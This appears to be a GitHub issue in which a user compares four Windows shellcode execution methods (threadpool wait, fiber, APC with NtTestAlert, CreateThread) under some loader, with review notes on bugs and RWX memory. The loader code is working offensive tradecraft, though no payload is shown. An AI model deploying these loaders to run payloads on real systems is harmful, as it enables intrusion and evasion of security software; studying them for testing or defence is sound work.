Open zhihuba opened 2 years ago
OS: Windows 10
// Issue reporter's test harness: four ways of running the same shellcode buffer
// in-process. `buf` (the shellcode bytes) and `shellSize` are defined outside this
// excerpt, and the snippets were pasted from inside one function body (each
// variant ends in `return 0;`), so only the first variant compiled in actually
// runs. This is dual-use red-team loader code: run it only against samples you
// own, in an isolated VM.
//
// NOTE(review): none of the calls below check their return value. VirtualAlloc,
// CreateEvent, CreateThreadpoolWait, ConvertThreadToFiber, CreateFiber,
// GetProcAddress and CreateThread can all return NULL, and the next line would
// then copy into or call through a null pointer.
//
// NOTE(review): the one variant the reporter marks as failing is also the only
// one that avoids an RWX mapping (RW allocation, then VirtualProtect to RX) and
// uses a plain CreateThread; the three marked as successful all allocate
// PAGE_EXECUTE_READWRITE. Whether "failed" means the loader broke the call or a
// security product blocked it is not stated in the issue.
//
// The following is the test code.

// Reporter: "successful call!!"

//// CreateThreadpoolWait: the shellcode is registered as the wait callback and
//// fires when the event (created already signaled) satisfies the wait.
HANDLE event = CreateEvent(NULL, FALSE, TRUE, NULL);
LPVOID shellcodeAddress = VirtualAlloc(NULL, shellSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
RtlMoveMemory(shellcodeAddress, buf, shellSize);
PTP_WAIT threadPoolWait = CreateThreadpoolWait((PTP_WAIT_CALLBACK)shellcodeAddress, NULL, NULL);
SetThreadpoolWait(threadPoolWait, event, NULL);
// NOTE(review): the event is auto-reset (bManualReset = FALSE), so once the
// threadpool wait consumes the signal this wait may block forever unless the
// callback signals the event again -- confirm intended. `event` and
// `threadPoolWait` are never closed (CloseHandle / CloseThreadpoolWait).
WaitForSingleObject(event, INFINITE);
return 0;

//// Fiber: convert the thread to a fiber, then switch to a fiber whose start
//// routine is the shellcode.
PVOID mainFiber = ConvertThreadToFiber(NULL);
PVOID shellcodeLocation = VirtualAlloc(NULL, shellSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(shellcodeLocation, buf, shellSize);
// NOTE(review): the first CreateFiber argument is the stack size (SIZE_T), so
// NULL here means 0 = default stack. The fiber is never deleted (DeleteFiber),
// and control only comes back to `return 0;` if the shellcode itself switches
// back to `mainFiber`.
PVOID shellcodeFiber = CreateFiber(NULL, (LPFIBER_START_ROUTINE)shellcodeLocation, NULL);
SwitchToFiber(shellcodeFiber);
return 0;

//// APC & NtTestAlert: queue the shellcode as a user APC on the current thread
//// and deliver it immediately via NtTestAlert.
typedef VOID(NTAPI* pNtTestAlert)(VOID);
// NtTestAlert is resolved at runtime from ntdll because it is not declared in
// the public SDK headers; calling it is intended to drain the APC just queued.
pNtTestAlert NtTestAlert = (pNtTestAlert)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtTestAlert");
LPVOID lpBaseAddress = VirtualAlloc(NULL, shellSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
memcpy(lpBaseAddress, buf, shellSize);
QueueUserAPC((PAPCFUNC)lpBaseAddress, GetCurrentThread(), NULL);
NtTestAlert();
return 0;

// Reporter: "call failed!!"

//// Basic call: RW allocation, copy, flip to RX, run on a new thread.
DWORD oldprotect = 0;
LPVOID base_addr = NULL;
// Allocate shellSize bytes with RW permission; deliberately not RWX
// (PAGE_EXECUTE_READWRITE).
base_addr = VirtualAlloc(0, shellSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
// Copy the shellcode into the new region (RtlMoveMemory is rarely seen here;
// memcpy would do the same job).
RtlMoveMemory(base_addr, buf, shellSize);
// Change the protection to RX (execute + read). Return value is unchecked; if
// this fails the thread below starts on a non-executable page.
VirtualProtect(base_addr, shellSize, PAGE_EXECUTE_READ, &oldprotect);
// Create a thread in the current process that executes the shellcode.
auto ct = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)base_addr, 0, 0, 0);
// Wait for the thread to finish. -1 converts to 0xFFFFFFFF == INFINITE; the
// thread handle `ct` is never closed.
WaitForSingleObject(ct, -1);
// Release the memory.
// NOTE(review): `base_addr` came from VirtualAlloc, not malloc. Passing it to
// the CRT free() is undefined behavior (heap corruption / crash); it should be
// VirtualFree(base_addr, 0, MEM_RELEASE). This alone can make this variant
// "fail" independently of any loader change.
free(base_addr);
Does this issue still exist with the latest version? There have been some major changes to the loader that may have fixed it.
OS: Windows 10
I tested with multiple execution methods (see the code above) before drawing this conclusion.